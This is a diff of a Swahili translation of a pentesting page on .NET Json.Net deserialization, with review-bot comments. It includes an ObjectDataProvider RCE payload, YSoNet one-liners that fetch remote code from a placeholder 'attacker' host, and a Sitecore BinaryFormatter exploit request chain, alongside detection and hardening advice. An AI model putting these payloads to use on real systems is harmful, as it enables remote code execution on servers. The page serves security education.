Katika [official web page](https://www.newtonsoft.com/json) inaonyesha kwamba maktaba hii inaruhusu **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. Kwa hiyo, ikiwa tunaweza **deserialize the ObjectDataProvider gadget**, tunaweza kusababisha **RCE** kwa ku-deserialize tu object.
|
||||
|
||||
### Mfano wa Json.Net
|
||||
### Json.Net example
|
||||
|
||||
Kwanza kabisa, hebu tuone mfano wa jinsi ya **kuhifadhi/kufungua tena** kitu kwa kutumia maktaba hii:
|
||||
Kwanza kabisa tuchunguze mfano jinsi ya **serialize/deserialize** object kutumia maktaba hii:
|
||||
```java
|
||||
using System;
|
||||
using Newtonsoft.Json;
|
||||
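Review bot: the heading "### Json.Net example" is left in English while the other headings in this file were translated ("### Kutumia vibaya Json.Net", "### Ugundaji & Kuimarisha"); either keep "### Mfano wa Json.Net" from the old line or keep all section headings in English consistently.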
@ -132,11 +132,11 @@ Console.WriteLine(desaccount.Email);
|
||||
}
|
||||
}
|
||||
```
|
||||
### Abusing Json.Net
|
||||
### Kutumia vibaya Json.Net
|
||||
|
||||
Using [ysoserial.net](https://github.com/pwntester/ysoserial.net) niliunda exploit:
|
||||
Kutumia [ysoserial.net](https://github.com/pwntester/ysoserial.net) nilitengeneza exploit:
|
||||
```java
|
||||
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
|
||||
yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
|
||||
{
|
||||
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
|
||||
'MethodName':'Start',
|
||||
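Review bot: the command line in this hunk was changed from `ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"` to `yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"`, dropping the "s"; the binary is `ysoserial.exe`, so restore the old line. The surrounding fence is tagged ```` ```java ```` but holds a shell command followed by JSON output; tag it `json` (or split the command into its own `bash` fence) so the payload renders correctly.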
@ -147,7 +147,7 @@ ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
|
||||
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
|
||||
}
|
||||
```
|
||||
Katika hii code unaweza **kujaribu exploit**, endesha tu na utaona kwamba calc inatekelezwa:
|
||||
Katika msimbo huu unaweza **jaribu exploit**, endesha tu na utaona kwamba calc itaanzishwa:
|
||||
```java
|
||||
using System;
|
||||
using System.Text;
|
||||
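Review bot: the test harness introduced with "Katika msimbo huu unaweza **jaribu exploit**" only fires because the deserializer is configured with `TypeNameHandling = TypeNameHandling.Auto` (visible in the context of the next hunk); the text should say that the `$type` payload is ignored when `TypeNameHandling` is `None`, otherwise readers will expect any `JsonConvert.DeserializeObject` call to be exploitable. The fence is again tagged ```` ```java ```` for C# code (`using System;` / `using System.Text;`); use `csharp`.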
@ -184,27 +184,27 @@ TypeNameHandling = TypeNameHandling.Auto
|
||||
}
|
||||
}
|
||||
```
|
||||
## Advanced .NET Gadget Chains (YSoNet & ysoserial.net)
|
||||
## Mnyororo ya Gadget za Advanced .NET (YSoNet & ysoserial.net)
|
||||
|
||||
Teknolojia ya ObjectDataProvider + ExpandedWrapper iliyotambulishwa hapo juu ni moja tu ya MIFUMO MINGI ya gadget ambazo zinaweza kutumika vibaya wakati programu inafanya **deserialization isiyo salama ya .NET**. Zana za kisasa za red-team kama **[YSoNet](https://github.com/irsdl/ysonet)** (na ya zamani [ysoserial.net](https://github.com/pwntester/ysoserial.net)) zinaweza kuunda **grafu za vitu vya uhalifu zenye matumizi tayari** kwa mamia ya gadgets na muundo wa serialization.
|
||||
Mbinu ya ObjectDataProvider + ExpandedWrapper iliyotanguliwa hapo juu ni moja tu kati ya MNYA mnyororo za gadget zinazoweza kutumiwa wakati programu inafanya **unsafe .NET deserialization**. Zana za kisasa za red-team kama **[YSoNet](https://github.com/irsdl/ysonet)** (na ile ya zamani [ysoserial.net](https://github.com/pwntester/ysoserial.net)) zinafanya otomatiki uundaji wa **ready-to-use malicious object graphs** kwa micolonyo mingi ya gadget na miundo ya serialization.
|
||||
|
||||
Hapa chini kuna rejeleo lililokandamizwa la mnyororo wa gadgets wenye manufaa zaidi uliotolewa na *YSoNet* pamoja na maelezo ya haraka ya jinsi zinavyofanya kazi na amri za mfano za kuzalisha payloads.
|
||||
Hapo chini ni rejea iliyoshinikizwa ya mnyororo muhimu zaidi zinazotoka ndani ya *YSoNet* pamoja na ufafanuzi mfupi wa jinsi zinavyofanya kazi na mifano ya amri za kuunda payload.
|
||||
|
||||
| Gadget Chain | Key Idea / Primitive | Common Serializers | YSoNet one-liner |
|
||||
|--------------|----------------------|--------------------|------------------|
|
||||
| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara tu inapokuwa na mwili, delegate ielekeze kwenye *yoyote* njia iliyotolewa na mshambuliaji (mfano `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
|
||||
| **ActivitySurrogateSelector** | Inatumia `System.Workflow.ComponentModel.ActivitySurrogateSelector` ili *kuepuka uainishaji wa aina za .NET ≥4.8* na moja kwa moja kuita **kijenga** cha darasa lililotolewa au **kuandika** faili ya C# papo hapo | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
|
||||
| **DataSetOldBehaviour** | Inatumia **uwakilishi wa zamani wa XML** wa `System.Data.DataSet` ili kuunda aina zisizo na mipaka kwa kujaza maeneo ya `<ColumnMapping>` / `<DataType>` (kwa hiari ikifanya uongo wa assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
|
||||
| **GetterCompilerResults** | Katika mazingira ya WPF (> .NET 5) inachanganya wapokeaji wa mali hadi kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inaandika* au *inaongeza* DLL iliyotolewa na `-c` | `Json.NET` typeless, `MessagePack` typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
|
||||
| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita njia isiyo na mipaka ya static kwa hoja zilizo na udhibiti. YSoNet inaongeza toleo la `--xamlurl` la urahisi kuhost XAML mbaya kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *n.k.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
|
||||
| **PSObject (CVE-2017-8565)** | Inajumuisha `ScriptBlock` ndani ya `System.Management.Automation.PSObject` inayotekelezwa wakati PowerShell inafanya deserialization ya kitu | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
|
||||
| Gadget Chain | Wazo Kuu / Primitive | Serializers Za Kawaida | YSoNet one-liner |
|
||||
|--------------|----------------------|------------------------|------------------|
|
||||
| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara ikirejeshwa, delegate itamwelekeza kwenye *method* yoyote iliyotolewa na mshambuliaji (kwa mfano `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
|
||||
| **ActivitySurrogateSelector** | Inatumia vibaya `System.Workflow.ComponentModel.ActivitySurrogateSelector` ili *kuipita type-filtering ya .NET ≥4.8* na kuitisha moja kwa moja **constructor** ya darasa lililotolewa au **kucompile** faili ya C# kwa wakati huo | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
|
||||
| **DataSetOldBehaviour** | Inatumia uwakilishi wa **XML wa zamani** wa `System.Data.DataSet` kuanzisha aina yoyote kwa kujaza sehemu za `<ColumnMapping>` / `<DataType>` (kwa hiari kuiga assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
|
||||
| **GetterCompilerResults** | Kwa runtimes zilizo na WPF (> .NET 5) inachomeka getters za mali hadi kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inacompile* au *inapakia* DLL iliyotolewa na `-c` | `Json.NET` typeless, `MessagePack` typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
|
||||
| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita method static yoyote yenye arguments zinazodhibiwa. YSoNet inaongeza chaguo la `--xamlurl` ili kuhost malicioius XAML kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *etc.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
|
||||
| **PSObject (CVE-2017-8565)** | Inaweka `ScriptBlock` ndani ya `System.Management.Automation.PSObject` ambalo linafanywa wakati PowerShell inadeserialise object | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
|
||||
|
||||
> [!TIP]
|
||||
> Payload zote zina **andikwa kwenye *stdout*** kwa chaguo-msingi, na kufanya iwe rahisi kuzipitisha kwenye zana nyingine (mfano: ViewState generators, base64 encoders, HTTP clients).
|
||||
> Payload zote huandikwa kwa **stdout** kwa chaguo-msingi, kufanya iwe rahisi kuzitumia kwa kupipa (pipe) kwenye zana nyingine (mfano ViewState generators, base64 encoders, HTTP clients).
|
||||
|
||||
### Building / Installing YSoNet
|
||||
### Kujenga / Kuisakinisha YSoNet
|
||||
|
||||
Ikiwa hakuna binaries zilizotengenezwa awali zinapatikana chini ya *Actions ➜ Artifacts* / *Releases*, amri ifuatayo ya **PowerShell** itaunda mazingira ya kujenga, kunakili hifadhi na kuunda kila kitu katika *Release* mode:
|
||||
Ikiwa hakuna binaries zilizojengwa tayari zinapatikana chini ya *Actions ➜ Artifacts* / *Releases*, PowerShell one-liner ifuatayo itaweka mazingira ya kujenga, kukuza repository na kucompile kila kitu katika mode ya *Release*:
|
||||
```powershell
|
||||
Set-ExecutionPolicy Bypass -Scope Process -Force;
|
||||
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
|
||||
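Review bot: the intro to the gadget-chain table contains two non-words, "MNYA mnyororo" (for "MINGI") and "micolonyo mingi ya gadget" (the old line had "mamia ya gadgets"), and the ObjectDataProvider row has "malicioius XAML" for "malicious XAML"; fix the spelling. In the build section "kukuza repository" means "grow the repository" where `git clone` is meant (the old line used "kunakili hifadhi"), so change it to "kuclone repository" or restore the old wording. The table header row is otherwise fine and the YSoNet one-liners match the old lines.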
@ -216,17 +216,48 @@ cd ysonet
|
||||
nuget restore ysonet.sln
|
||||
msbuild ysonet.sln -p:Configuration=Release
|
||||
```
|
||||
The compiled `ysonet.exe` inaweza kupatikana chini ya `ysonet/bin/Release/`.
|
||||
The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`.
|
||||
|
||||
### Detection & Hardening
|
||||
* **Gundua** michakato ya watoto isiyotarajiwa ya `w3wp.exe`, `PowerShell.exe`, au mchakato wowote unaofanya deserialization ya data iliyotolewa na mtumiaji (mfano `MessagePack`, `Json.NET`).
|
||||
* Wezesha na **lazimisha uchujaji wa aina** (`TypeFilterLevel` = *Full*, `SurrogateSelector` ya kawaida, `SerializationBinder`, *n.k.*) kila wakati `BinaryFormatter` / `NetDataContractSerializer` ya zamani haiwezi kuondolewa.
|
||||
* Pale inapowezekana hamasisha **`System.Text.Json`** au **`DataContractJsonSerializer`** na converters za msingi wa orodha nyeupe.
|
||||
* Zuia maktaba hatari za WPF (`PresentationFramework`, `System.Workflow.*`) zisipakuliwe katika michakato ya wavuti ambazo hazipaswi kuzihitaji kamwe.
|
||||
### Ugundaji & Kuimarisha
|
||||
* **Gundua** unexpected child processes of `w3wp.exe`, `PowerShell.exe`, or any process deserialising user-supplied data (e.g. `MessagePack`, `Json.NET`).
|
||||
* Wezesha na **lazimisha type-filtering** (`TypeFilterLevel` = *Full*, custom `SurrogateSelector`, `SerializationBinder`, *etc.*) kila inapowezekana wakati legacy `BinaryFormatter` / `NetDataContractSerializer` haziwezi kuondolewa.
|
||||
* Ambapo inawezekana hamisha kwenda **`System.Text.Json`** au **`DataContractJsonSerializer`** kwa converters zinazotegemea orodha ya kuruhusiwa.
|
||||
* Zuia WPF assemblies hatari (`PresentationFramework`, `System.Workflow.*`) kupewa load katika web processes ambazo hazipaswi kuhitaji.
|
||||
|
||||
## References
|
||||
## Mfano halisi wa sink: Sitecore convertToRuntimeHtml → BinaryFormatter
|
||||
|
||||
Sink ya vitendo ya .NET inayoweza kufikiwa katika mtiririko wa Sitecore XP Content Editor yenye uthibitisho:
|
||||
|
||||
- Sink API: `Sitecore.Convert.Base64ToObject(string)` inafunika `new BinaryFormatter().Deserialize(...)`.
|
||||
- Njia ya kuanzisha: pipeline `convertToRuntimeHtml` → `ConvertWebControls`, ambayo inatafuta kipengele jirani chenye `id="{iframeId}_inner"` na inasoma attribute ya `value` ambayo inachukuliwa kama data iliyoseriwalishwa iliyofungwa kwa base64. Matokeo hubadilishwa kuwa string na kuyaingiza kwenye HTML.
|
||||
|
||||
Minimal end‑to‑end (iliyothibitishwa):
|
||||
```
|
||||
// Load HTML into EditHtml session
|
||||
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
__PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
|
||||
<html>
|
||||
<iframe id="test" src="poc"></iframe>
|
||||
<dummy id="test_inner" value="BASE64_BINARYFORMATTER"></dummy>
|
||||
</html>
|
||||
|
||||
// Server returns a handle; visiting FixHtml.aspx?hdl=... triggers deserialization
|
||||
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
|
||||
```
|
||||
- Gadget: mnyororo wowote wa BinaryFormatter unaorejesha string (madhara ya pembeni yanaendeshwa wakati wa deserialization). Angalia YSoNet/ysoserial.net ili kuzalisha payloads.
|
||||
|
||||
Kwa mnyororo kamili unaoanza pre‑auth kwa HTML cache poisoning katika Sitecore na unaoelekeza kwa sink hii:
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/pentesting-web/sitecore/README.md
|
||||
{{#endref}}
|
||||
|
||||
## Marejeo
|
||||
- [YSoNet – .NET Deserialization Payload Generator](https://github.com/irsdl/ysonet)
|
||||
- [ysoserial.net – original PoC tool](https://github.com/pwntester/ysoserial.net)
|
||||
- [Microsoft – CVE-2017-8565](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-8565)
|
||||
- [watchTowr Labs – Sitecore XP cache poisoning → RCE](https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
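Review bot: the first bullet under "### Ugundaji & Kuimarisha" is only half translated ("**Gundua** unexpected child processes of `w3wp.exe`, `PowerShell.exe`, or any process deserialising user-supplied data"), and "The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`" is left in English; restore the Swahili from the old lines. In the new Sitecore section the request/response fence has no language tag, so `http` would help rendering, and the text should make explicit that `FixHtml.aspx?hdl=...` is the step that triggers `BinaryFormatter.Deserialize` via `Sitecore.Convert.Base64ToObject`, as the comment in the block already states, while the `EditHtml.aspx` POST only stores the HTML; the note that the gadget must return a string (so the cast to string does not throw before the side effect runs) is correct and worth keeping next to the `BASE64_BINARYFORMATTER` placeholder.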